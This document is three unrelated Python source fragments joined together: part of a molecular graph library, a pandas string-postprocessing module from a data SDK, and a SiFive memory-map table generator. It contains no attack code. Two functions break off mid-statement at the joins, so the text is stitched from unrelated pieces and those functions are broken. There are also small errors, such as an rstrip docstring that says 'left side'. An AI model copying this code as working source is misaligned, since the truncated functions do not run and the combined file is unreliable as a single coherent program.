"""
atm_dct, _ = xgr
return atm_dct
def bonds(xgr):
""" bonds, as a dictionary
"""
_, bnd_dct = xgr
return bnd_dct
def atom_keys(xgr):
""" atom keys
"""
return frozenset(atoms(xgr).keys())
def bond_keys(xgr):
""" bond keys
"""
return frozenset(bonds(xgr).keys())
def dummy_bond_keys(xgr):
""" dummy bond (order=0) keys
"""
return frozenset(dict_.keys_by_value(bond_orders(xgr), lambda x: x == 0))
def atom_symbols(xgr):
""" atom symbols, as a dictionary
"""
return mdict.by_key_by_position(atoms(xgr), atom_keys(xgr), ATM_SYM_POS)
def atom_implicit_hydrogen_valences(xgr):
""" atom implicit hydrogen valences, as a dictionary
"""
return mdict.by_key_by_position(atoms(xgr), atom_keys(xgr),
ATM_IMP_HYD_VLC_POS)
def atom_stereo_parities(sgr):
""" atom parities, as a dictionary
"""
return mdict.by_key_by_position(atoms(sgr), atom_keys(sgr),
ATM_STE_PAR_POS)
def bond_orders(rgr):
""" bond orders, as a dictionary
"""
return mdict.by_key_by_position(bonds(rgr), bond_keys(rgr), BND_ORD_POS)
def bond_stereo_parities(sgr):
""" bond parities, as a dictionary
"""
return mdict.by_key_by_position(bonds(sgr), bond_keys(sgr),
BND_STE_PAR_POS)
# setters
def relabel(xgr, atm_key_dct):
""" relabel the graph with new atom keys
"""
orig_atm_keys = atom_keys(xgr)
assert set(atm_key_dct.keys()) <= orig_atm_keys
new_atm_key_dct = dict(zip(orig_atm_keys, orig_atm_keys))
new_atm_key_dct.update(atm_key_dct)
_relabel_atom_key = new_atm_key_dct.__getitem__
def _relabel_bond_key(bnd_key):
return frozenset(map(_relabel_atom_key, bnd_key))
atm_dct = dict_.transform_keys(atoms(xgr), _relabel_atom_key)
bnd_dct = dict_.transform_keys(bonds(xgr), _relabel_bond_key)
return _create.from_atoms_and_bonds(atm_dct, bnd_dct)
def standard_keys(xgr):
""" replace the current atom keys with standard indices, counting from zero
"""
atm_key_dct = dict(enumerate(sorted(atom_keys(xgr))))
return relabel(xgr, atm_key_dct)
def transform_keys(xgr, atm_key_func):
""" transform atom keys with a function
"""
atm_keys = atom_keys(xgr)
atm_key_dct = dict(zip(atm_keys, map(atm_key_func, atm_keys)))
return relabel(xgr, atm_key_dct)
def set_atom_implicit_hydrogen_valences(xgr, atm_imp_hyd_vlc_dct):
""" set atom implicit hydrogen valences
"""
atm_dct = mdict.set_by_key_by_position(atoms(xgr), atm_imp_hyd_vlc_dct,
ATM_IMP_HYD_VLC_POS)
bnd_dct = bonds(xgr)
return _create.from_atoms_and_bonds(atm_dct, bnd_dct)
def set_atom_stereo_parities(sgr, atm_par_dct):
""" set atom parities
"""
atm_dct = mdict.set_by_key_by_position(atoms(sgr), atm_par_dct,
ATM_STE_PAR_POS)
return _create.from_atoms_and_bonds(atm_dct, bonds(sgr))
def set_bond_orders(rgr, bnd_ord_dct):
""" set bond orders
"""
bnd_dct = mdict.set_by_key_by_position(bonds(rgr), bnd_ord_dct,
BND_ORD_POS)
return _create.from_atoms_and_bonds(atoms(rgr), bnd_dct)
def set_bond_stereo_parities(sgr, bnd_par_dct):
""" set bond parities
"""
bnd_dct = mdict.set_by_key_by_position(bonds(sgr), bnd_par_dct,
BND_STE_PAR_POS)
return _create.from_atoms_and_bonds(atoms(sgr), bnd_dct)
def add_atom_implicit_hydrogen_valences(xgr, inc_atm_imp_hyd_vlc_dct):
""" add atom imlicit hydrogen valences
(increments can be positive or negative)
"""
atm_keys = list(inc_atm_imp_hyd_vlc_dct.keys())
atm_imp_hyd_vlcs = numpy.add(
dict_.values_by_key(atom_implicit_hydrogen_valences(xgr), atm_keys),
dict_.values_by_key(inc_atm_imp_hyd_vlc_dct, atm_keys))
assert all(atm_imp_hyd_vlc >= 0 for atm_imp_hyd_vlc in atm_imp_hyd_vlcs)
atm_imp_hyd_vlc_dct = dict_.transform_values(
dict(zip(atm_keys, atm_imp_hyd_vlcs)), int)
return set_atom_implicit_hydrogen_valences(xgr, atm_imp_hyd_vlc_dct)
def without_bond_orders(xgr):
""" resonance graph with maximum spin (i.e. no pi bonds)
"""
bnd_keys = bond_keys(xgr) - dummy_bond_keys(xgr)
bnd_ord_dct = dict_.by_key({}, bnd_keys, fill_val=1)
return set_bond_orders(xgr, bnd_ord_dct)
def without_stereo_parities(xgr):
""" graph with stereo assignments wiped out
"""
atm_ste_par_dct = dict_.by_key({}, atom_keys(xgr), fill_val=None)
bnd_ste_par_dct = dict_.by_key({}, bond_keys(xgr), fill_val=None)
xgr = set_atom_stereo_parities(xgr, atm_ste_par_dct)
xgr = set_bond_stereo_parities(xgr, bnd_ste_par_dct)
return xgr
def add_atoms(xgr, sym_dct, imp_hyd_vlc_dct=None, ste_par_dct=None):
""" add atoms to this molecular graph
"""
atm_keys = atom_keys(xgr)
atm_sym_dct = atom_symbols(xgr)
atm_imp_hyd_vlc_dct = atom_implicit_hydrogen_valences(xgr)
atm_ste_par_dct = atom_stereo_parities(xgr)
keys = set(sym_dct.keys())
imp_hyd_vlc_dct = {} if imp_hyd_vlc_dct is None else imp_hyd_vlc_dct
ste_par_dct = {} if ste_par_dct is None else ste_par_dct
assert not keys & atm_keys
assert set(imp_hyd_vlc_dct.keys()) <= keys
assert set(ste_par_dct.keys()) <= keys
atm_sym_dct.update(sym_dct)
atm_imp_hyd_vlc_dct.update(imp_hyd_vlc_dct)
atm_ste_par_dct.update(ste_par_dct)
atm_dct = _create.atoms_from_data(
atom_symbols=atm_sym_dct,
atom_implicit_hydrogen_valences=atm_imp_hyd_vlc_dct,
atom_stereo_parities=atm_ste_par_dct)
bnd_dct = bonds(xgr)
xgr = _create.from_atoms_and_bonds(atoms=atm_dct, bonds=bnd_dct)
return xgr
def add_bonds(xgr, keys, ord_dct=None, ste_par_dct=None):
""" add bonds to this molecular graph
"""
bnd_keys = set(bond_keys(xgr))
bnd_ord_dct = bond_orders(xgr)
bnd_ste_par_dct = bond_stereo_parities(xgr)
keys = set(map(frozenset, keys))
ord_dct = {} if ord_dct is None else ord_dct
ste_par_dct = {} if ste_par_dct is None else ste_par_dct
assert not keys & bnd_keys
assert set(ord_dct.keys()) <= keys
assert set(ste_par_dct.keys()) <= keys
bnd_keys.update(keys)
bnd_ord_dct.update(ord_dct)
bnd_ste_par_dct.update(ste_par_dct)
atm_dct = atoms(xgr)
bnd_dct = _create.bonds_from_data(
bond_keys=bnd_keys, bond_orders=bnd_ord_dct,
bond_stereo_parities=bnd_ste_par_dct)
xgr = _create.from_atoms_and_bonds(atoms=atm_dct, bonds=bnd_dct)
return xgr
def frozen(xgr):
""" hashable, sortable, immutable container of graph data
"""
atm_keys = sorted(atom_keys(xgr))
bnd_keys = sorted(bond_keys(xgr), key=sorted)
# make it sortable by replacing Nones with -infinity
atm_vals = numpy.array(dict_.values_by_key(atoms(xgr), atm_keys))
bnd_vals = numpy.array(dict_.values_by_key(bonds(xgr), bnd_keys))
atm_vals[numpy.equal(atm_vals, None)] = -numpy.inf
bnd_vals[numpy.equal(bnd_vals, None)] = -numpy.inf
frz_atms = tuple(zip(atm_keys, map(tuple, atm_vals)))
frz_bnds = tuple(zip(bnd_keys, map(tuple, bnd_vals)))
return (frz_atms, frz_bnds)
# graph theory library
# # atom properties
def atom_neighbor_keys(xgr):
""" keys of neighboring atoms, by atom
"""
def _neighbor_keys(atm_key, atm_nbh):
return frozenset(atom_keys(atm_nbh) - {atm_key})
atm_ngb_keys_dct = dict_.transform_items_to_values(
atom_neighborhoods(xgr), _neighbor_keys)
return atm_ngb_keys_dct
def atom_bond_keys(xgr):
""" bond keys, by atom
"""
return dict_.transform_values(atom_neighborhoods(xgr), bond_keys)
def atom_neighborhoods(xgr):
""" neighborhood subgraphs, by atom
"""
bnd_keys = bond_keys(xgr)
def _neighborhood(atm_key):
nbh_bnd_keys = set(filter(lambda x: atm_key in x, bnd_keys))
return bond_induced_subgraph(xgr, nbh_bnd_keys)
atm_keys = list(atom_keys(xgr))
atm_nbh_dct = dict(zip(atm_keys, map(_neighborhood, atm_keys)))
return atm_nbh_dct
# # bond properties
def bond_neighbor_keys(xgr):
""" keys of neighboring bonds, by bond
"""
def _neighbor_keys(bnd_key, bnd_nbh):
return frozenset(bond_keys(bnd_nbh) - {bnd_key})
bnd_ngb_keys_dct = dict_.transform_items_to_values(
bond_neighborhoods(xgr), _neighbor_keys)
return bnd_ngb_keys_dct
def bond_neighbor_bonds(bnd_key, xgr):
""" keys of neighboring bonds, by bond
"""
atmi, atmj = list(bnd_key)
ngb_atm_dct = atom_neighbor_keys(xgr)
bonds = []
for atm in [atmi, atmj]:
alpha_atms = ngb_atm_dct[atm]
for alpha_atm in alpha_atms:
if alpha_atm not in [atmi, atmj]:
bonds.append(frozenset({atm, alpha_atm}))
return bonds
def bond_neighborhoods(xgr):
""" neighborhood subgraphs, by bond
"""
bnd_keys = list(bond_keys(xgr))
def _neighborhood(bnd_key):
nbh_bnd_keys = set(filter(lambda x: bnd_key & x, bnd_keys))
return bond_induced_subgraph(xgr, nbh_bnd_keys)
bnd_nbh_dct = dict(zip(bnd_keys, map(_neighborhood, bnd_keys)))
return bnd_nbh_dct
# # other properties
def branch(xgr, atm_key, bnd_key, saddle=False, ts_bnd=None):
""" branch extending along `bnd_key` away from `atm_key`
"""
return bond_induced_subgraph(xgr, branch_bond_keys(xgr, atm_key, bnd_key, saddle=saddle, ts_bnd=ts_bnd), saddle=saddle)
def branch_atom_keys(xgr, atm_key, bnd_key, saddle=False, ts_bnd=None):
""" atom keys for branch extending along `bnd_key` away from `atm_key`
"""
return atom_keys(branch(xgr, atm_key, bnd_key, saddle=saddle, ts_bnd=ts_bnd)) - {atm_key}
def branch_bond_keys(xgr, atm_key, bnd_key, saddle=False, ts_bnd=None):
""" bond keys for branch extending along `bnd_key` away from `atm_key`
"""
#bnd_key is the set of atom indices for the bond of interest
# atm_bnd_keys_dct is a dictionary of atoms that are connected to each atom
# atm_bnd_keys_dct = atom_bond_keys(xgr)
# print('atm_bnd_keys_dct:', atm_bnd_keys_dct)
# bnch_bnd_keys = {bnd_key}
# seen_bnd_keys = set()
# form set of keys of atoms connected to atm_key
# excl_bnd_keys = atm_bnd_keys_dct[atm_key]
# if bnd_key in excl_bnd_keys:
# excl_bnd_keys = excl_bnd_keys - {bnd_key}
# print('excl_bnd_keys:', excl_bnd_keys)
# new_bnd_keys = {bnd_key}
# bnd_ngb_keys_dct = bond_neighbor_keys(xgr)
# print('bnd_ngb_keys_dct:', bnd_ngb_keys_dct)
# if bnd_key not in bnd_ngb_keys_dct:
# for bnd in bnd_ngb_keys_dct:
# atmi, atmj = list(bnd)
# if atmi in list(ts_bnd) or atmj in list(ts_bnd):
# bnds = list(bnd_ngb_keys_dct[bnd])
# bnds.append(ts_bnd)
# bnd_ngb_keys_dct[bnd] = frozenset(bnds)
# bnd_ngb_keys_dct[bnd_key] = bond_neighbor_bonds(bnd_key, xgr)
# if saddle and bnd_key != ts_bnd:
# for bnd in bnd_ngb_keys_dct:
# atmi, atmj = list(bnd)
# if atmi in list(ts_bnd) or atmj in list(ts_bnd):
# bnds = list(bnd_ngb_keys_dct[bnd])
# bnds.append(ts_bnd)
# bnd_ngb_keys_dct[bnd] = frozenset(bnds)
# bnd_ngb_keys_dct[ts_bnd] = bond_neighbor_bonds(ts_bnd, xgr)
bnd_key = frozenset(bnd_key)
assert atm_key in bnd_key
if not saddle:
assert bnd_key in bond_keys(xgr)
#print('xgr test:', xgr)
#print('atm_key:', atm_key)
#print('bnd_key:', bnd_key)
#print('saddle:', saddle)
#print('ts_bnd:', ts_bnd)
atm_bnd_keys_dct = atom_bond_keys(xgr)
bnch_bnd_keys = {bnd_key}
seen_bnd_keys = set()
excl_bnd_keys = atm_bnd_keys_dct[atm_key] - {bnd_key}
new_bnd_keys = {bnd_key}
#print('new_bnd_keys:', new_bnd_keys)
bnd_ngb_keys_dct = bond_neighbor_keys(xgr)
#print('bnd_ngb_keys_dct:', bnd_ngb_keys_dct)
if ts_bnd:
bnd_ngb_keys_dct[ts_bnd] = bond_neighbor_bonds(ts_bnd, xgr)
#print('updated bnd_ngb_keys_dct:', bnd_ngb_keys_dct)
while new_bnd_keys:
new_bnd_ngb_keys = set(
itertools.chain(
*dict_.values_by_key(bnd_ngb_keys_dct, new_bnd_keys)))
bnch_bnd_keys.update(new_bnd_ngb_keys - excl_bnd_keys)
seen_bnd_keys.update(new_bnd_keys)
new_bnd_keys = bnch_bnd_keys - seen_bnd_keys
#print('branch bond keys:', bnch_bnd_keys)
return frozenset(bnch_bnd_keys)
def rings(xgr):
""" rings in the graph (minimal basis)
"""
xgrs = [bond_induced_subgraph(xgr, bnd_keys)
for bnd_keys in rings_bond_keys(xgr)]
return tuple(sorted(xgrs, key=frozen))
def rings_sorted_atom_keys(xgr):
""" atom keys for each ring in the graph sorted by connectivity (minimal basis)
"""
def _sorted_ring_atom_keys(rng_bnd_keys):
rng_bnd_keys = list(rng_bnd_keys)
bnd_key = min(rng_bnd_keys, key=sorted)
first_atm_key, atm_key = sorted(bnd_key)
rng_bnd_keys.remove(bnd_key)
rng_atm_keys = [first_atm_key, atm_key]
while rng_bnd_keys:
bnd_key = next(filter(lambda x: atm_key in x, rng_bnd_keys))
rng_bnd_keys.remove(bnd_key)
bnd_key = set(bnd_key)
bnd_key.remove(atm_key)
atm_key = next(iter(bnd_key))
rng_atm_keys.append(atm_key)
rng_atm_keys.pop(-1)
rng_atm_keys = tuple(rng_atm_keys)
return rng_atm_keys
rng_atm_keys_lst = frozenset(
map(_sorted_ring_atom_keys, rings_bond_keys(xgr)))
return rng_atm_keys_lst
def rings_bond_keys(xgr):
""" bond keys for each ring in the graph (minimal basis)
"""
bnd_keys = bond_keys(xgr)
def _ring_bond_keys(rng_atm_keys):
return frozenset(filter(lambda x: x <= rng_atm_keys, bnd_keys))
nxg = _networkx.from_graph(xgr)
rng_atm_keys_lst = _networkx.minimum_cycle_basis(nxg)
rng_bnd_keys_lst = frozenset(map(_ring_bond_keys, rng_atm_keys_lst))
return rng_bnd_keys_lst
def connected_components(xgr):
""" connected components in the graph
"""
cmp_xgr_atm_keys_lst = connected_components_atom_keys(xgr)
cmp_xgrs = tuple(subgraph(xgr, cmp_xgr_atm_keys)
for cmp_xgr_atm_keys in cmp_xgr_atm_keys_lst)
return cmp_xgrs
def connected_components_atom_keys(xgr):
""" atom keys for each connected component in the graph
"""
nxg = _networkx.from_graph(xgr)
cmp_xgr_atm_keys_lst = _networkx.connected_component_atom_keys(nxg)
return cmp_xgr_atm_keys_lst
def union(xgr1, xgr2):
""" a union of two graphs
"""
assert not atom_keys(xgr1) & atom_keys(xgr2)
atm_dct = {}
atm_dct.update(atoms(xgr1))
atm_dct.update(atoms(xgr2))
bnd_dct = {}
bnd_dct.update(bonds(xgr1))
bnd_dct.update(bonds(xgr2))
return _create.from_atoms_and_bonds(atm_dct, bnd_dct)
def subgraph(xgr, atm_keys):
""" the subgraph induced by a subset of the atoms
"""
atm_keys = set(atm_keys)
assert atm_keys <= atom_keys(xgr)
bnd_keys = set(filter(lambda x: x <= atm_keys, bond_keys(xgr)))
atm_dct = dict_.by_key(atoms(xgr), atm_keys)
bnd_dct = | |
<reponame>ToucanToco/toucan-data-sdk<gh_stars>1-10
from typing import Any, List
import numpy as np
import pandas as pd
__all__ = (
'lower',
'upper',
'title',
'capitalize',
'swapcase',
'length',
'isalnum',
'isalpha',
'isdigit',
'isspace',
'islower',
'isupper',
'istitle',
'isnumeric',
'isdecimal',
'strip',
'lstrip',
'rstrip',
'center',
'ljust',
'rjust',
'split',
'rsplit',
'partition',
'rpartition',
'find',
'rfind',
'index',
'rindex',
'startswith',
'endswith',
'concat',
'contains',
'repeat',
'replace_pattern',
# 'slice',
# 'slice_replace',
# 'count'
)
###################################################################################################
# METHODS WITH NO EXTRA PARAMETERS
#
# All these functions have the same signature:
# :param df: the dataframe
# :param column: the column
# :param new_column: the destination column (if not set, `column` will be used)
# :return: the transformed dataframe
###################################################################################################
def _generate_basic_str_postprocess(method_name, docstring):
def f(df, column: str, new_column: str = None):
method = getattr(df[column].str, method_name)
new_column = new_column or column
df.loc[:, new_column] = method()
return df
f.__name__ = method_name
f.__doc__ = f"""
{docstring}
See [pandas doc](
https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.Series.str.{method_name}.html) for more information
---
### Parameters
*mandatory :*
- `column` (*str*): the column
*optional :*
- `new_column` (*str*): the destination column (if not set, `column` will be used)
"""
return f
doc = 'Compute length of each string of `column`'
length = _generate_basic_str_postprocess('len', doc)
# lower, upper, capitalize, title, swapcase
###################################################################################################
doc = 'Converts all characters of `column` to lowercase.'
lower = _generate_basic_str_postprocess('lower', doc)
doc = 'Converts all characters of `column` to uppercase.'
upper = _generate_basic_str_postprocess('upper', doc)
doc = (
'Converts first character to uppercase and remaining ' 'to lowercase for each line of `column`.'
)
capitalize = _generate_basic_str_postprocess('capitalize', doc)
doc = (
'Converts first character to uppercase and remaining '
'to lowercase for each word of each line of `column`.'
)
title = _generate_basic_str_postprocess('title', doc)
doc = 'Converts uppercase to lowercase and lowercase to uppercase for each word of `column`.'
swapcase = _generate_basic_str_postprocess('swapcase', doc)
# isalnum, isalpha, isdigit, isspace, islower, isupper, istitle, isnumeric, isdecimal
###################################################################################################
doc = 'Check whether all characters in each string in `column` are alphanumeric'
isalnum = _generate_basic_str_postprocess('isalnum', doc)
doc = 'Check whether all characters in each string in `column` are alphabetic'
isalpha = _generate_basic_str_postprocess('isalpha', doc)
doc = 'Check whether all characters in each string in `column` are digits'
isdigit = _generate_basic_str_postprocess('isdigit', doc)
doc = 'Check whether all characters in each string in `column` are whitespace'
isspace = _generate_basic_str_postprocess('isspace', doc)
doc = 'Check whether all characters in each string in `column` are lowercase'
islower = _generate_basic_str_postprocess('islower', doc)
doc = 'Check whether all characters in each string in `column` are uppercase'
isupper = _generate_basic_str_postprocess('isupper', doc)
doc = 'Check whether all characters in each string in `column` are titlecase'
istitle = _generate_basic_str_postprocess('istitle', doc)
doc = 'Check whether all characters in each string in `column` are numeric'
isnumeric = _generate_basic_str_postprocess('isnumeric', doc)
doc = 'Check whether all characters in each string in `column` are decimal'
isdecimal = _generate_basic_str_postprocess('isdecimal', doc)
###################################################################################################
# STRIP METHODS
#
# All these functions have the same signature:
# :param df: the dataframe
# :param column: the column
# :param to_strip: (str: None) set of characters to be removed
# :param new_column: the destination column (if not set, `column` will be used)
# :return: the transformed dataframe
###################################################################################################
def _generate_strip_str_postprocess(method_name, docstring):
def f(df, column: str, *, to_strip: str = None, new_column: str = None):
method = getattr(df[column].str, method_name)
new_column = new_column or column
df.loc[:, new_column] = method(to_strip)
return df
f.__name__ = method_name
f.__doc__ = f"""
{docstring}
See [pandas doc](
https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.Series.str.{method_name}.html) for more information
---
### Parameters
*mandatory :*
- `column` (*str*): the column
*optional :*
- `to_strip` (*str*): set of characters to be removed
- `new_column` (*str*): the destination column (if not set, `column` will be used)
"""
return f
doc = 'Strip whitespace (including newlines) from each string in `column` from both sides'
strip = _generate_strip_str_postprocess('strip', doc)
doc = 'Strip whitespace (including newlines) from each string in `column` from left side'
lstrip = _generate_strip_str_postprocess('lstrip', doc)
doc = 'Strip whitespace (including newlines) from each string in `column` from left side'
rstrip = _generate_strip_str_postprocess('rstrip', doc)
###################################################################################################
# METHODS with `width` and `fillchar`
#
# All these functions have the same signature:
# :param df: the dataframe
# :param column: the column
# :param width: (int) minimum width
# :param fillchar: (default: \' \') additional character for filling
# :param new_column: the destination column (if not set, `column` will be used)
# :return: the transformed dataframe
###################################################################################################
def _generate_width_str_postprocess(method_name, docstring):
def f(df, column: str, *, width: int, fillchar: str = ' ', new_column: str = None):
method = getattr(df[column].str, method_name)
new_column = new_column or column
df.loc[:, new_column] = method(width, fillchar=fillchar)
return df
f.__name__ = method_name
f.__doc__ = f"""
{docstring}
See [pandas doc](
https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.Series.str.{method_name}.html) for more information
---
### Parameters
*mandatory :*
- `column` (*str*): the column
- `width` (*int*): minimum widt
*optional :*
- `fillchar` (*str*): additional character for filling
- `new_column` (*str*): the destination column (if not set, `column` will be used)
"""
return f
doc = 'Filling left and right side of strings in `column` with an additional character'
center = _generate_width_str_postprocess('center', doc)
doc = 'Filling right side of strings in `column` with an additional character'
ljust = _generate_width_str_postprocess('ljust', doc)
doc = 'Filling left side of strings in `column` with an additional character'
rjust = _generate_width_str_postprocess('rjust', doc)
###################################################################################################
# SPLIT METHODS
#
# All these functions have the same signature:
# :param df: the dataframe
# :param column: the column
# :param new_columns: the destination columns
# (if not set, columns `column_1`, ..., `column_n` will be created)
# :param sep: (default: \' \') string or regular expression to split on
# :param limit: (default: None) limit number of splits in output
# :return: the transformed dataframe
###################################################################################################
def _generate_split_str_postprocess(method_name, docstring):
def f(df, column: str, *, new_columns: List[str] = None, sep: str = ' ', limit: int = None):
method = getattr(df[column].str, method_name)
df_split = method(pat=sep, n=limit, expand=True)
nb_cols = df_split.shape[1]
if new_columns and (not isinstance(new_columns, list) or nb_cols > len(new_columns)):
raise ValueError(f"'new_columns' should be a list with at least {nb_cols} elements")
if new_columns is None:
new_columns = [f'{column}_{i}' for i in range(1, nb_cols + 1)]
df[new_columns[:nb_cols]] = df_split
return df
f.__name__ = method_name
f.__doc__ = f"""
{docstring}
See [pandas doc](
https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.Series.str.{method_name}.html) for more information
---
### Parameters
*mandatory :*
- `column` (*str*): the column
*optional :*
- `sep` (*str*): string or regular expression to split on
- `limit` (*int*): limit number of splits in output (by default, there is no limit)
- `new_columns` (*list*): the destination columns (by default, new columns will be added automatically)
"""
return f
doc = 'Split each string in the caller’s values by given pattern, propagating NaN values'
split = _generate_split_str_postprocess('split', doc)
doc = (
'Split each string `column` by the given delimiter string, '
'starting at the end of the string and working to the front'
)
rsplit = _generate_split_str_postprocess('rsplit', doc)
###################################################################################################
# PARTITION METHODS
#
# All these functions have the same signature:
# :param df: the dataframe
# :param column: the column
# :param new_columns: the 3 destination columns
# :param sep: (default: \' \') string or regular expression to split on
# :return: the transformed dataframe
###################################################################################################
def _generate_partition_str_postprocess(method_name, docstring):
def f(df, column: str, *, new_columns: List[str], sep: str = ' '):
if len(new_columns) != 3:
raise ValueError('`new_columns` must have 3 columns exactly')
method = getattr(df[column].str, method_name)
df[new_columns] = method(sep)
return df
f.__name__ = method_name
f.__doc__ = f"""
{docstring}
See [pandas doc](
https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.Series.str.{method_name}.html) for more information
---
### Parameters
*mandatory :*
- `column` (*str*): the column
- `new_columns` (*list*): the 3 destination columns
*optional :*
- `sep` (*str*): string or regular expression to split on
"""
return f
doc = (
'Split the string at the first occurrence of sep, and return 3 elements containing '
'the part before the separator, the separator itself, and the part after the separator. '
'If the separator is not found, return 3 elements containing the string itself, '
'followed by two empty strings.'
)
partition = _generate_partition_str_postprocess('partition', doc)
doc = (
'Split the string at the last occurrence of sep, and return 3 elements containing '
'the part before the separator, the separator itself, and the part after the separator. '
'If the separator is not found, return 3 elements containing two empty strings, '
'followed by the string itself.'
)
rpartition = _generate_partition_str_postprocess('rpartition', doc)
###################################################################################################
# INDEX AND FIND METHODS
#
# All these functions have the same signature:
# :param df: the dataframe
# :param column: the column
# :param new_column: the destination column (if not set, `column` will be used)
# :param sub: substring being searched
# :param start: (default: 0) left edge index
# :param end: (default: None) right edge index
# :return: the transformed dataframe
###################################################################################################
def _generate_find_str_postprocess(method_name, | |
# Copyright 2019 SiFive, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You should have received a copy of LICENSE.Apache2 along with
# this software. If not, you may obtain a copy at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#################################################################
#
# Classes and functions for working with memory maps.
# These routines are factored into three groups"
# - Representing and working with memory maps
# - Creating a displayable MemoryMapTable from memory maps
# - Building memory maps from ObjectModel design elements.
#
# This factoring allows the code to be reused for multiple purposes.
# For example, they can
# - Provide an overall memory map of a core complex.
# - Verify multiple TIMs are or are not contiguous.
# - Provide detailed memory maps of specific components.
# - Provide a deterministic ordering of devices (by base address ...)
#
#################################################################
import sys
from typing import Iterable, List, NamedTuple, TypeVar, Tuple
from scribble.model import Element, DocumentException, n_bytes, hex_addr, QueryStream
from scribble.template import human_size
import scribble.table as table
#################################################################
#
# The following classes define the elements of an AddressMap.
#
# We then define three instances of an AddressMap
# RangeMap - contains only the address ranges.
# RegionMap - adds permissions and a description for a range of memory (or memory mapped regs)
# SectionMap - only adds a note.
#
# The basic idea is to abstract out the address range handling.
# If additional information is needed, extra fields can be added to a subtype of AddressRange.
#
################################################################
class AddressRange(NamedTuple):
base: int
size: int
@property
def top(self) -> int:
"""Exclusive upper bound of address range."""
return self.base + self.size - 1
# Specialize the Address Range to include permissions and a description.
# Used by scribble to describe each address range in detail.
class MemoryRange(NamedTuple, AddressRange):
base: int
size: int
description: str
readable: bool
writeable: bool
executable: bool
cacheable: bool
atomics: bool
@property
def top(self):
return self.base + self.size - 1
# Specialise the Address Map to contain a note describing the address range.
# This is used by scribble to give a general overview of the addresses.
class SectionRange(NamedTuple, AddressRange):
base: int
size: int
notes: str
@property
def top(self):
return self.base + self.size - 1
# Type variable representing a sub-type of AddressRange
R = TypeVar("R", bound=AddressRange)
class AddressMap(List[R]):
"""
Creates a address map from a collection of address range elements.
"""
def __init__(self, ranges: Iterable[R]):
# Sort the ranges by base address.
sorted_ranges = sorted(ranges, key=lambda region: region.base)
super().__init__(sorted_ranges)
# Verify we have no overlapping regions.
self.assert_no_overlapping_ranges()
def is_contiguous(self) -> bool:
regions = self
for i in range(1, len(regions)):
if regions[i - 1].top + 1 != regions[i].base:
return False
return True
@property
def address_range(self) -> AddressRange:
if self.is_empty():
return AddressRange(0, 0)
else:
return AddressRange(self[0].base, self[-1].top)
def total_size(self) -> int:
return sum(region.size for region in self)
def is_empty(self) -> bool:
return not self
def assert_no_overlapping_ranges(self):
"""
Verify none of the regions overlap
:param regions: ordered list of memory regions with "range" added in.
"""
regions = self
for i in range(1, len(regions)):
if regions[i - 1].top >= regions[i].base:
raise DocumentException(
f"Memory Regions {regions[i-1]} and " f"{regions[i]} overlap"
)
# Specialize the maps based on the subtypes of AddressRange.
RegionMap = AddressMap[MemoryRange]
SectionMap = AddressMap[SectionRange]
# Type variables representing sub-types of AddressRange.
R1 = TypeVar("R1", bound=AddressRange)
R2 = TypeVar("R2", bound=AddressRange)
def correlate_maps(
smaller: AddressMap[R1], bigger: AddressMap[R2]
) -> Iterable[Tuple[List[R1], R2]]:
"""
Correlate the regions of one map within the regions of the second map.
Raise error if any of the former don't fit entirely within the second.
"""
# Start with the first of the smaller regions.
small_iter = iter(smaller)
small = next(small_iter, None)
# For each of the big regions
for big in bigger:
# Accumulate group of smaller regions which fit inside the big region
group = []
while small is not None and small.top <= big.top and small.base >= big.base:
group.append(small)
small = next(small_iter, None)
# Yield the group of small regions which fit within the big region.
yield (group, big)
# If we reach the end and still have smaller regions, then the smaller region didn't fit.
if small is not None:
raise DocumentException(f"correlate_maps: Address Range {small} does't fit into section")
###############################################################################
#
# Routines for creating a displayable MemorySectionTable from memory map data structures.
#
################################################################################
class MemorySectionTable(table.Table):
def __init__(self, title: str, regions: RegionMap, reference_id: str, sections: SectionMap):
"""
Construct a memory map table based on a detailed memory map and a section overview map.
:param title: The title of the table.
:param regions: detailed memory mapped regions
:param reference_id: reference id of the table.
:param sections: overview sections for summarizing the detailed regions.
:return: a displayable asciidoc table.
"""
# If a single overview section with no notes, then don't show notes column.
show_notes = len(sections) > 1 or sections[0].notes
header = [
table.HeaderCell("Base", halign=table.HAlign.RIGHT, style=table.Style.MONOSPACED),
table.HeaderCell("Top", halign=table.HAlign.RIGHT, style=table.Style.MONOSPACED),
table.HeaderCell("Attr.", style=table.Style.MONOSPACED),
table.HeaderCell("Description"),
] + ([table.HeaderCell("Notes")] if show_notes else [])
# Group the memory regions by corresponding sections.
regions_by_section = correlate_maps(regions, sections)
regions_by_section = list(regions_by_section)
# For each section, format a set memory map rows.
padding = n_bytes(sections[-1].top) # How many bytes to display in addresses.
rows = [
row
for regs, section in regions_by_section
for row in _get_table_rows_for_section(section, regs, show_notes, padding)
]
super().__init__(
title=title, reference_id=reference_id, header=header, autowidth=True, rows=rows
)
def _get_table_rows_for_section(
section: SectionRange, regions: List[MemoryRange], show_notes: bool, padding: int
) -> Iterable[table.Row]:
"""
Return Row objects for each section.
The last column spans all rows within the section, so the first row
will have an additional column.
"""
# get list of strings for each table row.
rows = list(get_region_rows(regions, section.base, section.top, padding))
# Add a note to first row which spans all the rows in this section.
if show_notes:
rows[0].append(
table.Cell(contents=section.notes, row_span=len(rows), valign=table.VAlign.MIDDLE)
)
return map(table.Row, rows)
def get_region_rows(
regions: List[MemoryRange], base: int, top: int, padding: int
) -> Iterable[List[str]]:
"""
Generate a sequence of memory table rows, spanning from base to top. Fill gaps with "Reserved".
"""
# for each region in the section
for region in regions:
# if there is a gap, create a reserved row.
if base < region.base:
yield [hex_addr(base, padding), hex_addr(region.base - 1, padding), "", "Reserved"]
# create a row for the region
yield [
hex_addr(region.base, padding),
hex_addr(region.top, padding),
format_permission(region),
region.description,
]
# Move to the next region.
base = region.top + 1
# If there is a gap at the end, another reserved region.
if base <= top:
yield [hex_addr(base, padding), hex_addr(top, padding), "", "Reserved"]
